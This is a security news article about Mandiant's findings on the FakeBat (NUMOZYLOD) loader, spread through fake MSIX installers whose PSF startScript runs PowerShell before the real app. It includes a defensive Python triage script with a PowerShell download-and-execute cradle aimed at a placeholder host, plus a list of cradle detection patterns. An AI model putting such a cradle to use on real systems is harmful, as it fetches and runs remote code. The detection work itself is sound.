Installing just one app will completely deprive you of your privacy.
Cybersecurity researchers have recorded a sharp increase in infections tied to a malware distribution campaign that uses a downloader called NUMOZYLOD.
According to Mandiant, the attacks are opportunistic and target users searching for popular business software. Infection begins with a trojanized MSIX installer that runs a PowerShell script to fetch the second-stage payload.
NUMOZYLOD, also known as FakeBat, EugenLoader, and PaykLoader, is linked to a threat actor operating under the name Eugenfest. Mandiant attributes the malware to a Malware-as-a-Service (MaaS) operation it tracks as UNC4536.
The infection chain starts with drive-by downloads: users looking for popular software are steered to fake sites offering trojanized MSIX installers. Payloads delivered through FakeBat include well-known families such as IcedID, RedLine Stealer, Lumma Stealer, SectopRAT, and Carbanak, the last of which is associated with the FIN7 group.
UNC4536 uses malvertising to distribute trojanized MSIX installers posing as popular programs such as Brave, KeePass, Notion, Steam, and Zoom. The installers are hosted on lookalike sites that mimic the legitimate vendors' pages, which tricks users into downloading the infected versions.
A distinctive feature of the attacks is the use of MSIX installers, whose startScript configuration (a Package Support Framework, PSF, feature) lets a PowerShell script run before the main application launches. This makes the attacks especially dangerous: the malware starts working before the user ever sees the program they meant to install.
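A quick way to check a downloaded MSIX for exactly this hook, as an added example (my own Python, not Mandiant's tooling or anything from the FakeBat samples): an MSIX is a zip archive, so the script opens it, reads the PSF config.json at the package root, lists every startScript and endScript hook, and greps the referenced PowerShell script for download-cradle markers. The package it scans is constructed inline; the "Example.App" identity, the setup.ps1 file name and the example.invalid URL are assumptions for the demonstration.

```python
"""Triage an MSIX package for PSF start/end script hooks and suspicious
PowerShell inside them. Added example; not Mandiant's or the attacker's code."""
import io
import json
import re
import zipfile

# PowerShell download-cradle / evasion markers to look for in a hooked script.
SUSPICIOUS = [
    r"Invoke-WebRequest", r"\biwr\b", r"DownloadString", r"DownloadFile",
    r"Invoke-Expression", r"\biex\b", r"-EncodedCommand", r"-enc\b",
    r"FromBase64String", r"Start-BitsTransfer", r"Net\.WebClient",
]


def find_psf_scripts(zf: zipfile.ZipFile) -> list:
    """Return (hook kind, application id, script path) for each PSF script
    hook declared in config.json. PSF paths are relative to the package root."""
    if "config.json" not in zf.namelist():
        return []
    cfg = json.loads(zf.read("config.json").decode("utf-8-sig"))
    hooks = []
    for app in cfg.get("applications", []):
        for kind in ("startScript", "endScript"):
            hook = app.get(kind)
            if isinstance(hook, dict) and hook.get("scriptPath"):
                path = hook["scriptPath"].replace("\\", "/")
                hooks.append((kind, app.get("id", "?"), path))
    return hooks


def scan_script(text: str) -> list:
    """Return the sorted list of SUSPICIOUS patterns found in a script body."""
    return sorted({p for p in SUSPICIOUS if re.search(p, text, re.IGNORECASE)})


def triage_msix(data: bytes) -> dict:
    """Open an MSIX (zip) from bytes and report every script hook with the
    indicators found in it. Verdict: clean (no hooks), review (hooks but no
    indicators), suspicious (hook script contains download/eval markers)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = set(zf.namelist())
        findings = []
        for kind, app_id, path in find_psf_scripts(zf):
            body = zf.read(path).decode("utf-8", "replace") if path in names else ""
            findings.append({"hook": kind, "app": app_id, "script": path,
                             "present": path in names,
                             "indicators": scan_script(body)})
    if any(f["indicators"] for f in findings):
        verdict = "suspicious"
    elif findings:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hooks": findings, "verdict": verdict}


def build_sample(with_hook: bool = True) -> bytes:
    """Constructed sample package (assumed names; not a real FakeBat artefact).
    With with_hook=True it carries a startScript pointing at a PowerShell
    download cradle, mirroring the technique described above."""
    manifest = ('<?xml version="1.0"?><Package><Identity Name="Example.App" '
                'Publisher="CN=Example" Version="1.0.0.0"/></Package>')
    app = {"id": "App", "executable": "VFS\\ProgramFilesX64\\App\\app.exe"}
    if with_hook:
        app["startScript"] = {"scriptPath": "setup.ps1",
                              "runInVirtualEnvironment": True,
                              "waitForScriptToFinish": False,
                              "showWindow": False}
    cradle = ("$u='http://example.invalid/stage2'\n"
              "$c=New-Object Net.WebClient\n"
              "IEX $c.DownloadString($u)\n")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AppxManifest.xml", manifest)
        zf.writestr("config.json", json.dumps({"applications": [app]}))
        zf.writestr("PsfLauncher64.exe", b"MZ")  # placeholder bytes only
        if with_hook:
            zf.writestr("setup.ps1", cradle)
    return buf.getvalue()


if __name__ == "__main__":
    print(json.dumps(triage_msix(build_sample()), indent=2))
```

A "review" verdict is not a clean bill of health: legitimate packagers do use PSF hooks, so read the script rather than trusting the pattern list, and treat a hook whose script is missing from the archive or fetched at run time as worth a closer look.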
UNC4536 effectively acts as a distributor, using FakeBat as a transport to deliver the next stage of the infection. The loader is reported to collect system information, including operating system details, domain membership, and installed antivirus products.
Some variants also collect the host's public IP address and send it to the command-and-control (C2) server. For persistence, a shortcut is created in the Startup folder.
The malware campaign reviewed by Mandiant highlights the importance of caution when downloading software from the Internet, especially from unknown or suspicious sites.
Even the most popular programs can become bait for cybercriminals using sophisticated methods such as Trojan installers to infiltrate the system. Only attentiveness and the use of trusted sources for downloading will help minimize the risks of infection and data loss.
Source